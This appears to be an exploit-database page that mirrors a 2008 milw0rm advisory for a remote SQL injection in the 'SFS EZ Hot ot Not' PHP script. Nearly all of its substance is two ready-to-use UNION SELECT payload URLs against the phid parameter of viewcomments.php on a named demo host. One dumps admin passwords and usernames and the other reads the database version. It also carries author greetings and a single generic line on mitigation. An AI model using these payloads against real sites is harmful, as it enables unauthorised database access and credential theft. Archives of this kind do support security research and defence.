header-logo
Suggest Exploit
vendor:
EZ Hot ot Not
by:
d3b4g
7.5
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: EZ Hot ot Not
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

SFS EZ Hot ot Not[viewcomments.php?phid] Remote SQL Injection Vulnerability

Discovered by d3b4g, this vulnerability allows an attacker to inject malicious SQL queries into the vulnerable application. Exploit demo: http://www.turnkeyzone.com/demos/hot/viewcomments.php?phid=-1+union+all+select+1,concat(password,username),3,4,5,6+from+admin/* and version: http: www.turnkeyzone.com/demos/hot/viewcomments.php?phid=-1+union+all+select+1,@@version,3,4,5,6/*

Mitigation:

Input validation and sanitization should be implemented to prevent SQL injection attacks.
Source

Exploit-DB raw data:

	SFS EZ Hot ot Not[viewcomments.php?phid] Remote SQL Injection Vulnerability
       ===============================================================


----------------------------------------------------------------
script : SFS EZ Hot ot Not 

script  :  http://www.scripts-for-sites.info

Risk : High

----------------------------------------------------------------

Discovered by : d3b4g

email : bl4ckend[at]gmail[dot]come

Site. www.bl4ck3nd.info

----------------------------------------------------------------
Exploit demo: http://www.turnkeyzone.com/demos/hot/viewcomments.php?phid=-1+union+all+select+1,concat(password,username),3,4,5,6+from+admin/*


version: http: www.turnkeyzone.com/demos/hot/viewcomments.php?phid=-1+union+all+select+1,@@version,3,4,5,6/*
----------------------------------------------------------------


----------------------------------------------------------------
Greetz: str0ke,,Hotlism.org,All my friends
          
-----------------------------------------------------------------
Proud to be a maldivian :))
=======================

----------------------------------------------------------------

# milw0rm.com [2008-10-31]

Navigation

Suggest Exploit

Services By CQR